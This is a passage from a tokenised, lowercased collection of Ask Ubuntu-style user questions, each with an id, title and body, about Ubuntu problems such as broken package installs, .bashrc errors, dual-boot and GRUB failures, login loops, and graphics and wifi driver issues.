status 2 setting up libphonon4 ( 4:4.7.0really4.6.0-0ubuntu1 ) ... no apport report written because maxreports is reached already setting up phonon-backend-gstreamer ( 4:4.7.0really4.6.2-0ubuntu0.1 ) ... setting up gstreamer0.10-ffmpeg ( 0.10.13-1 ) ... setting up phonon ( 4:4.7.0really4.6.0-0ubuntu1 ) ... setting up minitube ( 1.6-1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : icaclient error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up icaclient ( 12.1.0 ) ... dpkg : error processing icaclient ( -- configure ) : subprocess installed post-installation script returned error exit status 2 please help ... .
314222	how to reset .bashrc file which edited before to set path android sdk	bash : export : `/home/entw/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local /bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /bin ' : not a valid identifier bash : /home/entw/.bashrc : line 111 : unexpected eof while looking for matching ` '' ' bash : /home/entw/.bashrc : line 112 : syntax error : unexpected end of file entw @ entw-desktop : ~ $ this is the error i frequently getting in terminal , shows when opend termianl . the following commands i applied in terminal , sudo gedit $ home/.bashrc and added some path varable like android sdk , and run the following command source ~/.bashrc got the error in terminal bash : export : `/home/entw/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local /bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /bin ' : not a valid identifier bash : /home/entw/.bashrc : line 111 : unexpected eof while looking for matching ` '' ' bash : /home/entw/.bashrc : line 112 : syntax error : unexpected end of file entw @ entw-desktop : ~ $ but if i try to open agin that file shows the error file or directory not found . what do i do to set all correct ? ? , please any help ? this forum i tried [ forum ] : http : //forum.xda-developers.com/showthread.php ? t=919425 `` -- point 2 ''
314223	i can not get google + video conferencing to work on ubuntu 12.04 lts	it asks me to install a plugin , but then the installation fails with the following message . breaks existing package 'google-talkplugin : i386'conflict google-talkplugin ( ) is there anything that i can do ?
314224	want to use windows and ubuntu in single partition	i 've windows 8 in my pc , and want to install ubuntu 13 within same partition is it possible to use both the os in single partition
314230	continuous integration for ubuntu phone ?	is there any kind of framework that lets a controlling pc automate the flashing of a connected phone , waiting for the phone to boot and then tell it to download and execute tests from a repository ? i know about autopilot for applications , but i 'm more interested in ci of boot loaders , drivers and platform stuff . a related question : is there a global repository of tests for ubuntu phone ? best regards
314231	how to identify process that 's sending error messages to terminal ?	the following error message occasionally appears in my terminal : failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory ... which is pretty annoying . i have searched online for solutions to this error , without success . is there any way to at least identify the process responsible for sending these error messages to my terminal ? edit : let me clarify that , as far as i can tell , these error messages appear `` out of the blue '' . in fact , they appear asynchronously with respect to my interactions with the terminal ( more often than not see them for the first time when i return to a terminal window that has been unattended for some time ) . i 'm sure there 's a definite , deterministic cause for these messages , but it is not one that i can readily identify . in short , i have not noticed any pattern or regularity to their occurrence . in particular , in my case their occurrence has nothing to do with running mplayer , or any other video playback program . ( please my earlier post about it here . ) for one thing , the machine in question is a work machine , and i rarely watch any videos with it . in the very few instances in which i 've watched a video on this machine i 've used vlc , not mplayer , and these errors never appeared in these rare occasions that i used vlc .
314232	installing ie8 with winetricks	i have been trying to install internet explorer 8 via winetricks on the default wine-prefix but i 'm getting an error after the unpack process , saying my configuration is 64-bits and internet explorer 8 does n't support it . my question is , can i change the wine-prefix configuration ? since i have a game installed on it that the update took a really long time . i also tried using pol installed via software center and i get same error i am using xubuntu 12.10 , and wine 1.6rc .
314236	nvidia x server settings	i got this message . anybody can help ? you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server .
314239	transfering from ubuntu to windows	i recently bought an ssd and it is plugged in correctly , however i would like to create a dual boot on my ssd with with windows and ubuntu . the problem is my ubuntu is already installed on my 2tb hard drive how can i get my computer to boot into the ssd and/or transfer ubuntu onto the ssd and the install ubuntu . there is nothing on the hard drive that i need to save . thanks
314246	why is ubuntu changing my microphone sensitivity ?	i 've installed ubuntu a few days ago . i am very satisfied with it , but there are some errors i ca n't fix . there is this problem with the microphone sensitivity . when i 'm skyping my friends are angry at me , because the microphone-sensitivity is changing constantly . it 's getting more sensitive until it ca n't get more . they even can hear cars driving along the road . i clicked the speakers button in the upper right corner and was evebn able to see the sensitivity increase . so if that was enough info for you , i 'd be very grateful for you to answer my question xdd thank you in advance max
314254	how to re-enable unity webapps in ubuntu 13.04 ?	back in previous versions of ubuntu i 've removed unity webapps packages . now i want to reinstall them . i use chromium , installed unity-chromium-extension package . also reset default dconf settings ( see screenshot below ) . i 'm currently trying to install grooveshark webapp , as you see already included grooveshark.com domain in the dconf settings , also installed unity-webapps-grooveshark package , but still cant make webapps work in ubuntu . besides when i go to chromium settings there is no desktop integration properties at all , though 'unity webapps chromium extension '' is enabled . any thoughts ? update ( also see update 2 below ) : after some package reinstallations i got this message when i visited twitter.com with chromium : when i accepted and opened twitter app from the dash it was opened as a standalone chromium app , but there still were no additional launcher options when i right-clicked the icon . i think it still has n't integrated properly . update 2 : i just tried to install reddit app , accepted the confirmation box in chromium but reddit app has not appeared in the dash . seems above mentioned twitter app was a remaining of the times before i removed packages .
314258	dualboot ( win 8 / ubuntu 13 ) is stuck at 'switching to clocksource '	for days i have been crawling the web for solutions to my problem , but coul n't find any . here it is : i got a new laptop ( asus vivobook s200e ) with win 8 oem preinstalled . i wanted to create a dual-boot system with ubuntu 13 next to it . i read about uefi and that i have to turn of secure boot and use the existing efi partition as bootloader for ubuntu . so i did . i also ran boot-repair reinstalling the grub . the result is when i start the computer i get into the boot menu . so far , so good . when i pick win everthing is fine . but when i choose ubuntu ( recovery ) the system starts , but gets stuck at the line ' [ 1.806366 ] switching to clocksource tsc ' . i already tried other versions of ubuntu ( 12.04.2 , 12.10 ) . i played with boot-repair ( using the recommended fix , setting everything manually ) . but nothing works . it 's always the same issue . i read that it could be a problem concerning graphic drivers , but this i can hardly believe . if this is any help , boot-repair gave me this link to post in fora . http : //paste.ubuntu.com/5810391/ thanks for any help in advance i want to add that after a couple of frustrating days i decided to install ubuntu as a single os . unforunately with no success , i.e . this problem has got nothing to do with dual-boot or win 8 whatsoever . i hope that these new findings can bring some light into what the problem might be and how i can fix it . i have tried editing the grub in order to set another clocksource as a kernel boot parameter ( in recovcery mode - as the normal mode stays black resp . purple ) . here is the list of settings i have tried : clocksource=hpet clocksource=pit clocksource=notsc clocksource=acpi_pm clocksource=jiffies clocksource=nolapic no idea , what they mean or do , but these kernel boot changes had little or no effect at all . i found them on superuser .
314259	login loop ubuntu 12.04	today i restarted ubuntu 12.04 , after installing some packages and having updated firefox . when i came in the login screen , i typed my password . after about one second processing , the screen blacked out and returned to the login screen . it gave no errors ( like invalid password ) . i read something about lightdm causing this issue , so i tried to install gdm in tty . when i tried to do this , tty gave me an 'incorrect password ( or login ) ' error . i am very sure my password was correct and i even tried ticking it in the command section so i could rule out changes in the keyboard layout . i would be very thankful if someone could help me out of this problem since i am now unable to use ubuntu and similar questions wo n't solve my problem ( since i ca n't get in tty altogether ) . edit : i forgot to tell that 2d login and guest login do n't work either . i 've tried to use mv ~/.xauthority ~/.xauthority.old , which did n't work ( the tty did n't give a reaction and it did n't resolve the problem ) . i also tried to install gdm ( to stop using lightdm ) using sudo apt-get install gdm and it responded with : sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins other than this , i have n't tried anything yet . edit ( 2 ) : i tried the command sudo rm ./.xauthority , which gave the same error as above . do i need to re誰nstall ( or retrieve a backup of ) my system or can it be saved ? edit ( 3 ) : i solved the sudo problem ( thanks shantanu ! ) . i needed to change ownership of several ( sudo-related ) files . i used pkexec to change ownership using the terminal . i now realize that this shift in ownership may be the cause of my loginloop problem . sudo does work now , so i 'll try some other commands . i would be thankful if someone can offer me help on this matter !
314261	why am i stuck while installing xubuntu on netbook ?	i just downloaded xubuntu and created a bootable usb as mention in the website using startup disk creator then i checked the priority of booting and the first was uefi : usb flash ... . then a menu showed up listing four options 1-try 2- install 3-for manufacturer 4-detect disk or something like that .
314262	partition alignment confusion	i have a new samsung 840 250gb ssd on the way , and i want to make sure that everything is running optimally after install . i 've spent many frustrating hours on the internet trying to understand how i should align the partitions of the ssd when it arrives ( and even how to partition everything ; my other drive is a 1tb hdd with files already on it ) . i 'd like to know a foolproof way of setting everything up . now , the only place i could find the erase block size of the 840 is here : http : //thessdreview.com/forums/ssd-beginners-guide-discussion/3630.htm i simply ca n't understand why such information is n't made freely accessible by manufacturers ! but , anyway , this would suggest the ebs is 1536kb , which seems odd to me . it is to my understanding that you should now align by mib ( usually set at 1mib ) . i assume that the figure above should actually be 1536k b=1.5mib ? this seems to suggest the partition alignment will be somewhat non-standard . so my question is : how do i align my partitions given this information ? please bear in mind that i have never used linux before ; i 'm doing my best to get everything set up so that i can begin to learn but am finding this process incredibly opaque and time consuming . if possible , a step by step guide through gparted would be great ; at the moment i 'm considering an ntfs partition ~20gb for windows ( playing games ) , an ext4 ~20gb for ubuntu ( for doing everything else ) and a shared documents+games partition for everything else in ntfs file format . i 'm not going to have any swap partition and use swap files instead .
314263	wireless only semi-working with lenovo ideapad s10-3t netbook ( driver broadcom corporation bcm4313 802.11b/g/n wireless lan controller )	wi-fi in this laptop was working perfectly with 11.10 version of ubuntu . now , with 12.04.2 or 13.04 it only works with some networks . it works with wep but i have n't been able to make it work with wpa . been looking for a solution but most of them tell you to add some lines to /etc/modprobe.d/blacklist-bcm43.conf , and i guess in my case does n't help because my ubuntu already comes with that file , with the following content : # warning : this file is autogenerated by bcmwl . all changes to this file will be lost blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma so , anybody knows how to solve this problem ? thanks
314265	my hp pavilion dv6 laptop overheats on ubuntu but not on win7	hp pavilion dv6 1256tx gets hotter while running ubuntu 13.04 than on win 7.. i am kind of new on ubuntu.. i tried many methods mentioned on different forums but none could not get it correct.. : /
314267	how can i install nautilus-gksu ?	i heard about nautilus-gksu and would like to install it . unfortunately , when i try , i get this : glemi @ xps : ~ $ sudo apt-get install nautilus-gksu reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nautilus-gksu how and where can i get this package ?
314268	disabling restricted graphics drivers not listed by jockey-text	i 've got a mid 2010 13 '' macbook pro ( 7.1 ) that 's been running 12.04 happily for the past year or so . i recently upgraded to 12.10 , and so reverted to nouveau graphics drivers . this led to serious 3d rendering problems , so i switched to using nvidia drivers as per https : //help.ubuntu.com/community/macbookpro7-1/quantal # video.2bac8-graphic_card . unfortunately that did n't go well , leading to an unbootable system after enabling the driver ( it got through the plymouth splash , screen went to black and system was entirely unresponsive ) . reverted to nouveau drivers by booting into recovery shell , remounting the filesystem and using jockey-text -- no-dbus to disable the driver . back to square 1 . i then tried the other available nvidia_current option from the restricted drivers menu ( included vpdau and some other bits , i ca n't remember exactly what ) and rebooted . once again problems , but different ones . instead of booting to a graphic login prompt , i get dumped to tty1 . tty7 meanwhile is churning away some sort of log , which always ends at apache starting , preceded by lightdm starting . relevant lines from the end of dmesg seem to be init : lightdm main process terminated with status 1 ... init : failsafe-x main process terminated with status 1 annoyingly , i ca n't revert to nouveau drivers as running jockey-text -l from a tty does n't show the driver i selected , and all shown graphics drivers are shown as disabled . it looks related to this bug , i 've had all the symptoms listed there running with the nouveau driver ( especially the random temporary freezes ) since upgrading , and the random mess on the plymouth screens even under 12.04 . unfortunately that bug seems to have received no attention at all . i 'm up for any methods to either get back to the nouveau driver which at least lets me use the system , or get a working nvidia driver ( which would of course be ideal ) . any suggestions ?
314270	how does ubuntu earn money ?	from the moment that i used your os i have become a fan . fan of it 's simplicity and beauty , but i worry about the creators . creating something that is so simple and easy to use plus a beautiful os requires a lot of money . your os is just like the mac it is so simple to use , but unlike them you gave it for free . i would suggest that you sort of copy apple . make your own app store that way you 'll earn money plus developers would be easily be able to make money too . second you can sell music videos books and magazines so that it could generate income just like android . as a windows 8 user i find it easy to navigate to your os . make the apps upgradable . and i like how your os design language fits perfectly on smartphones , tablets and tvs . i ca n't donate because i do n't know how to use paypal , but i think that this might help you . try copying what apple and android has done , and combine it in a way that it will attract developers and users but at the same time you could earn money . thanks and one more thing please while developers are busy creating they 're apps please create exclusive apps of your own .
314275	how do i use fbr files ?	i have a video file in fbr format . these files are supported in bb flash back express . i want to install that in my ubuntu , but could n't find any way . is there any way to install flash back player in ubuntu ? specs : os : ubuntu 12.04
314276	i accidentally removed the trash folder at /local/share/trash . how to recover it ?	how to recover the trash folder that i deleted from /local/share/trash . will it cause any problems on my system ?
314282	driver r8169 not working after installing kernel 3.9.8	i tried to install kernel 3.9.8 on my kubuntu raring , but the network driver do n't work anymore ! ( r8169 ) i hope that it is fixed as soon as possible . i went to kernel.org and there is written that i can ask for support here . so if there are other users with my same problem or users that know how to resolve this problem help me please . thanks .
314284	determine the source of particular available package ?	think you have a package which is installed or is available by apt or software manager . so you have it 's repository already added . now you need help another user add needed repository . how can i determine the repository which that package is available from ?
314285	what is vnc4server configuration file for ubuntu 13.04 ?	i need vnc4server configuration file ( xstartup ) for ubuntu 13.04 for both gnome 3.8 and unity , so it fixes the grey screen problem .
314286	false network problem when i try to upgrade my ubuntu	when i try to upgrade my ubuntu appears an error . it says check your internet connection . but there is definitely no network problem as i 'm posting this . help me with screen shots for every step .
314294	ubuntu saying no operating system found when installing	i have a hp laptop with 500 gb hard disk . when i am trying to install ubuntu in my laptop it is showing that `` there is no operating system found in your system do you want to install ? the whole data will be lost . '' but i am already using windows 7 . it is not showing the option along with windows 7 . please give me the solution .
314295	problem with nvidia geforce4 mx 4000	hi ! is this card working with ubuntu . is there any driver ? when i installed ubuntu 12.04 there was a black screen . thx , akitoru
314298	any idea to change the blank appearance on password	whenever i edit the terminal or change password in linux it appears as blank ( i.e it wont show the password ) , any idea to make appearance of it ( as * ) i face the following difficulty i dont know how many characters i am typing for correct password any third party tool or tweak to make apperance of typing password as * ?
314301	how to change ext4 hard drive partion to ntfs for installing windows xp ?	i have a ubuntu in root directory with separated home directory . this is all my hard partition . i inserted xp cd to install it but i ca n't find any hard drive suggestion ! i decided to boot it by gparted and change the root directory to ntfs , i formatted it and run xp cd again . i ca n't find any hard drive too . i do n't want to change all partitions because i do n't want to lose my data on them . what should i do ?
314303	managing a remote ubuntu server	i hire an ubuntu server which i access remotely and i purchased a domain for my webpage . i am totally new to this server thing and to ubuntu as well . what applications should i install on the server ? i need to transfer files to the server , i guess i would use filezilla the same way i use it to upload files to my free website . but to have a username and password should i install an ftp server and create a user on ubuntu ? my website will send automated messages to users , so do i need to install a mail server as well ? what other software should i install on the server apart from a firewall and an anti-virus ? should i partition the hard drive ( 3tb ) and how ? how partitions should i create and in what size for what applications ? btw i use windows 7 on my computer , so i am basically a windows user .
314304	unity shell not starting after upgrade from 12.10 to 13.04	i upgraded from 12.10 to 13.04 last night , and unity wo n't start up for me now . when i log in , i do n't see the 'dash ' , just the desktop with some icons on it . i 'm running on a lenovo t430 without a dedicated graphics card , so no propritary drivers installed . the 'unity_support_test ' command shows everything is good . i 've tried some of the advice i 've found on here such as doing : dconf reset -f /org/compiz/ unity -- reset-icons & disown but it does n't help . if i use ccsm and turn off the 'enable ubuntu unity plugin ' then run 'unity ' from a terminal , it starts up , and i get window decorations on the terminal i started . with the unity plugin enabled if i start unity in a terminal i get a segmentation fault right after the lines : compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell if i log in with a guest account i get similar behaviour , so i do n't think it 's a user setting of some kind . any advice ? i know i could go with gnome or xfce or something , but i 'd rather not go down that road if i did n't have to .
314307	ubuntu for android : status ?	does anyone know what the current status of this project is ? i am very eager to try it out , but there does not seem to be any available download , nor information on which handsets/hardware to use .
314309	ssd tweaks under 13.04 ?	i 'm going to install 13.04 on my home microserver , an hp n54l , specifically on a kingston ssd . i 'm wondering what tweaks are still worth making to extend the life of the ssd ? i know that previously it was important to make a number of changes so that the os is gentler on the drive . many thanks , hermonski
314314	laser printer scanner brother dcp-8110dn ubuntu . what is its uri ?	this computer uses ubuntu 12.10 32bits , and the printer connected with ethernet . **note : i had to install first csh and tcsh . i have followed these instructions : http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/faq_prn.html # f00104 this is the automated procedure , at the end of the installation process it asks if i will specify the uri , and following the instructions in the linked page i said yes . this is what the terminal asks then : will you specify the device uri ? [ y/n ] - > y 0 : ipp 1 : ipps 2 : lpd 3 : socket 4 : beh 5 : hp 6 : https 7 : ipp14 8 : smb 9 : http 10 : hpfax 11 ( i ) : specify ip address . select the number of destination device uri . - > 6 i typed 6 , but i really do not know why or what to choose . help please . any other tip on how to install this printer . the other option i have is to follow the default procedure from brother.com , but those instructions expand over and over on these pages , way too complicated for an average user , office user like myself . i understand i should choose cups , i want to connect with ethernet as i have several computer in my house 's lan . http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html # dcp-8110dn http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/instruction_prn1a.html http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/before.html # 002 http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_scn.html
314315	newer versions of chromium ?	i 've been wondering why the ubuntu 's version of chromium is still on 25 -- from lucid up until raring -- while the current stable version is 28 . the only reason i use chromium is to use the web apps integration . ps : i have tried to use the web apps integration on another version of chromium -- not google chrome -- which is 28 then it seems that some features i use was lost while using other version than 25 . edit : sorry i forgot to tell you i use the 13.04 version and also the development branch 13.10 . my question was : why does ubuntu does n't update the package in the repository to the current stable version ?
314329	is it possible to use python with the ubuntu sdk ?	david planella wrote in his answer to a question i posted that : ... the recommended way to develop apps for ubuntu is the ubuntu sdk . so i installed it , but looks like the supported programming language is c++ . does it mean i will need to know c++ to develop a new application for ubuntu ? is c++ the recommended programming language for ubuntu application now ? what about python , i started learning it hoping to develop applications for ubuntu .
314336	installing ubuntu 13.04 along side window 7 64 bit	i have a 64 bit computer with windows os . here are my specifications : core i3 processor 4 gb ram nvdia ge210 hard disk with 680 gb memory in my windows installation i have c : drive with 104 gb , d : drive with 246gb and e : drive with 246gb memory . my dvd rom is in f : drive . i want to install ubuntu 13.04 64 bit along side windows 7 . so i burned the ubuntu 64 bit iso image onto a dvd and restarted the computer . but in the choice for installations , there is no option to select installing ubuntu along side windows . there is an option to install ubuntu inside windows instead . there are other options as well . what should i do to get the option to install ubuntu along side windows . i think the problem is with the number of drives in windows . please tell me how should i make a partition in windows 7 to install ubuntu . thanks a lot..
314338	how to replace windows 7 completely and repair grub	i am trying to install ubuntu on hp probook 4530s x64 system . there is windows 7 already installed and i want to remove it . so i format c : \ drive and make to partition \ ( sha2 ) and swap ( sha4 ) from it . there is also a partition sha1 ( 300mb ) for mbr ( do n't know what is it ) , i just leave it . after some time i get fatal error unable to install grub and so i choose partition sha1 when it asks . now at boot time there is option to choose windows 7 but not for ubuntu and windows is also removed . i also try to install grub form other answers but no success . how to replace windows completely and where to install grub and what to do with 300mb ( mbr ) ?
314343	using ubuntu to fix windows	i dual booted ubuntu along side windows 7 because the keyboard and mouse on my laptop had stopped responding . both work perfect while using ubuntu so , could i use some of the drivers from ubuntu to help fix windows ?
314344	how do i install d-link dwa-140 on ubuntu 12.04 ?	when i try to run the .exe file , this error notice comes up . archive : /media/dwa-140/dwa140.exe [ /media/dwa-140/dwa140.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/dwa-140/dwa140.exe or /media/dwa-140/dwa140.exe.zip , and can not find /media/dwa-140/dwa140.exe.zip , period . is there any steps i can take to get this to run ? thanks !
314348	deactivated wifi drivers , now they wo n't activate again on a dell mini 10v ?	i have ubuntu 13.04 . in the software and update menu , under additional drivers , were it says `` broadcom corporation ; bcm4312 802.11b/glp.phy '' the box labbeled `` do not use it ticked '' and when i try tick the one that says `` using broadcom 802.11 linux sta wireless drivers ... .. '' it wont let me apply changes , it starts doing it then stops and re-ticks the do not use box . because of this i can not use the wiress driver . is there another way i can fix this . or maby restore ubuntu to previous date . i accidentally ticked the do not use box this morning and now ca n't undo it . i have restarted several times to try apply changes and still no luck
314349	blood bowl not working	blood bowl ( a windows game ) is not working on computer ( which runs ubuntu ) even though i am running blood bowl using wine . it runs however it does not create a window . you can here the music playing but see nothing . the version is chaos edition and the rating is silver . i 'm running wine 1.4.1 and the ubuntu is 13.04 . i can not find a fullscreen option in the config . help ? i 'm a newb ...
314350	access samba shares before login	i installed ubuntu 12.10 on an old compaq c300 . i want to use it to share my movies over lan so that the rest of my family can watch without hi-jacking my pc . i installed samba and shared the public folder under the home folder of my user account . but i can only access this folder from my win 7 pc when i am logged in . if i log out or restart without logging in then i can not access the shared folder . i am used to the windows service that starts at boot making shared files available over the network before the user has logged in . how can i accomplish this in ubuntu ?
314354	how to customize the ubuntu gnome 3 desktop ?	this is maybe a stupid question , but how can i choose my own background image on ubuntu gnome 3 ? ? i click on settings - > background - > then i click on the current background preview to change it but i see only the defaults images ! no + symbol to add or something . on the 'pictures ' tab there is nothing to select , i get an empty white page ? i am running ubuntu gnome 13.04 3.9.6-030906-generic . thanks !
314355	would like to design new theme for cinelerra , please help	like cinelerra so much , but interface is so ugly . it is one of best linux software but l think people wont use it because of ugly not intuitive themes that makes video editing on it so hard . please help with basic tips how to start , compile theme ( when am make it ) and other stuff .
314356	using dualshock 3 controller via usb ( no bluetooth )	i am trying to use a dualshock 3 controller via usb , but i can not get any input from it . i followed the ubuntu guide with qtsixa , but it said i needed bluetooth . my computer has no bluetooth adapter , and i do n't feel like buying a dongle . does anyone know of an alternative , usb-only method ?
314359	rm if there 's a file with same basename	say i have the following files : foo.coffee foo.js bar.js is there an easy way how to rm *.js if there 's a corresponding .coffee file ? in the example such a command would remove foo.js leaving : foo.coffee bar.js i 'm looking for some sort of a rm wrap as i need to do a recursive rm -r .
314360	i 'm trying to install sublime text 2 on my ubuntu machine	i have downloaded the 64bit executable sublime text file and have extracted it . it then created a subdirectory called sublime text 2 . i can see because i 've done an ls . the problem is when i do cd sublime text 2 , i get : -bash : cd : sublime : no such file or directory . can you please tell me what i 'm doing wrong ? i 'm a newbie at linux !
314362	ubuntu 13.04 login loop	i have a problem with ubuntu 13.04 . i can not log in to my account . i put the right password but there is an endless loop . ( if i put wrong pass , it says `` invalid password ... '' ) . also , it doesnt show the small drop down menu with choices `` gnome fallback , default , etc.. '' if i login as guest , the desktop is clear , no bars , no menus , anything . just right clicks works only . i have already try this solution ( chown username : username .xauthority ) but there is no `` xauthority '' at ubuntu 13.04 . ( ? ) is the problem about lightdm ? also , i tried sudo dpkg-reconfigure lightdm but it soes n't work . i use the recovery mode ( root command shell or something like this ) in order to try the above commands . has anyone a solution ? thank you .
314367	file not found grub rescue >	let me tell you the story from the beginning i had a mutltiboot system -ubuntu , windows 7 ( pre-installed ) . as we know there is a loader ( the one that give us multi os choice ) that start loading from the ubuntu os but what i do here is i just manualy format the partition ( on disk manager app on windows 7 ) that has the ubuntu os ( not the loader- they are distnict actually ) it was working fine until the first reboot that i met with this command for the first time error : unknown file system grub rescue > i got the answer for this and try it but it only work to load the linux one and i just already delete all the source files for ubuntu so it could n't make it . so i tried to get onother linux- fedora16 . amazingly the live cd provided me with those partitons of loaders i formated the partition of what it said 'linux swap space ' . and the next reboot message was error : file not found grub rescue >
314368	laptop suspend resumes immediately in ubuntu 13.04	i have a lenovo ideapad p500 laptop . while running 12.10 , it suspended and resumed just fine but after upgrading to 13.04 yesterday , when i suspend it ( either by closing the lid or using the `` cog '' icon ) , it goes down , and then resumes immediately . is there any fix for this ?
314369	ubuntu app development for desktop	i wish to start app development in ubuntu for desktop . however , in the website for ubuntu development , i find information related only to phone development . the ubuntu sdk - can it be used for desktop app development too ? ? ?
314371	black screen after install menu - 13.04	when i can get to the install menu under uefi but when i attempt to install i get a black screen that only responds to ctrl+alt+del restart command . try ubuntu install oem install check disk i tried the `` nomodeset '' thing by editing the install script-thingy and it did n't work . however , it looks like i 'm in over my head . i 'm using an asrock a75m-hvs with an amd a6-3500 . i have no optical drive and am trying to install ubuntu 13.04 using a usb stick . i have updated the bios which did nothing ( not that i expected it would ) .
314373	battery drain , ca n't adjust brightness , overheating	i have a hp pavillion dv7 specs : intel core i7 @ 2.23 ghz ( 2nd . gen ) 2 hard drives ( 500gb hdd , 160gb ssd ) ati radeon hd xt 7 my pc is constantly overheating and my battery is drained in less than an hour . i am on ubuntu 13.04 . i already calibrated my battery for two nights . anyone having the same problem or anyone knows a solution ? i 'm also having a problem with my brightness , i ca n't adjust it .
314374	grub 1.99 boot screen help	i am just recently installed linux on my oplitex gx280 . every time t log on i am met by the grub 1.99 screen and select ( ubuntu , with linux 3.5.0-34-generic ) . i need my computer to boot up automatically so i adjusted the /etc/default/grub file and set grub_timeout=3 and ran update-grub . however the grub menu did n't change and have discovered there is no time out and wo n't advance until you choose an option . i have even tried using the grub_savedefault=true line . i have also done a reinstall of grub from my boot cd with no luck . this is what my grub file looks like after the reinstall : if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' ubuntu , with linux 3.5.0-34-generic '' grub_hidden_timeout= '' 5 '' grub_hidden_timeout_quiet= '' false '' grub_timeout= '' 3 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo ' # grub_gfxmode= '' 640x480 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_disable_os_prober= '' true '' grub_savedefault= '' true '' please help me solve this issue and keep in mind that i am fairly new to linux thx
314376	how to change languages with alt+shift	i use 3 languages when i brows the internet and changing it from the top panel is quite disturbing on windows you can changed the languages with pressing alt+shift so can i some how do the same on ubuntu thank you in advanced
314382	after installation , ubuntu 13.04 boots to black screen	my pc : hp compaq nvidia geforce 5500 2.5 gb ram 2.1ghz . i 'm installing ubuntu 13.04 for the first time . after install ubuntu asks to reboot the computer to complete installation . the pc then hangs when it gets to the pc boot screen . just a black screen . i 've tried to restart and turning the pc off . when it boots , i get same thing , a black screen .
314386	install older headers	i am attempting to install an amd-catalyst video card driver after purchasing a new card . the installer requires linux-kernel-headers 3.7 due to a recent update , i have kernel version 3.8-25 installed . how do i install the older kernel headers so the installation will proceed ?
314392	kernel error during upgrade or update commands	i am getting these errors during sudo apt-get update and upgrade ... i tried all possible options no success . i recently upgraded to 13.04 and had problems with broadcom wifi . fixed tat issues using the clean script ... but looks like it did not install the kernel properly.. here is the o/p of the few scripts i ran : ashesh @ ashesh-hpdv4 : ~ $ sudo dpkg -r bcmwl-kernel-source ( reading database ... 175338 files and directories currently installed . ) removing bcmwl-kernel-source ... removing all dkms modules done . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-25-generic cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/mtd/mtd.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/mtd/mtd.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/sfc/sfc.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/sfc/sfc.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/mellanox/mlx4/mlx4_core.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/mellanox/mlx4/mlx4_core.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/broadcom/bnx2x/bnx2x.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/broadcom/bnx2x/bnx2x.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/broadcom/cnic.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/broadcom/cnic.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/qlogic/netxen/netxen_nic.ko’ : input/output error cp : failed to extend ‘/tmp/mkinitramfs_8gjkwq//lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/qlogic/netxen/netxen_nic.ko’ : input/output error cp : reading ‘/lib/modules/3.8.0-25-generic/kernel/drivers/net/ethernet/brocade/bna/bna.ko’ : input/output error cp : failed to extend 